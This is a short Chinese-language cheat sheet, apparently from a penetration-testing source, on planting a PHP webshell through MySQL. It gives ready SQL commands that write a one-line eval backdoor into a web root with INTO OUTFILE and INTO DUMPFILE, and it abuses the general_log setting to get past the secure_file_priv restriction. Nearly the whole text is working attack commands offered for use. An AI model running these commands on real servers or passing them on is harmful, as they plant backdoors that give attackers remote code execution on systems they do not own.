一、常规导入shell的操作
创建数据表导出shell
CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );
INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘<?php @eval($_POST[pass]);?>’);
SELECT `content` FROM `shadow9` INTO OUTFILE ‘C:\\phpStudy\\WWW\\90sec.php’;
DROP TABLE IF EXISTS `shadow9`;
Ps:(1)利用条件secure_file_priv=(未写路径)
(2)知道目标的绝对路径
二、一句话导出shell:
select ‘<?php @eval($_POST[pass]);?>‘ into outfile ‘c:/phpstudy/www/90sec.php‘;
select ‘<?php @eval($_POST[pass]);?>‘ into outfile ‘c:\\phpstudy\\www\\90sec.php‘;
select ‘<?php @eval($_POST[pass]);?>‘ into dumpfile ‘c:\\phpstudy\\www\\bypass.php‘;
Ps:(1)利用条件secure_file_priv=(未写路径)
(2)知道目标的绝对路径
三、日志备份获取shell
show global variables like "%genera%"; //查询general_log配置
set global general_log=‘on‘; //开启general log模式
SET global general_log_file=‘D:/phpStudy/WWW/cmd.php‘; //设置日志文件保存路径
SELECT ‘<?php phpinfo();?>‘; //phpinfo()写入日志文件
set global general_log=‘off‘; //关闭general_log模式
Ps:(1)可以绕过secure_file_priv=
(2)知道目标的绝对路径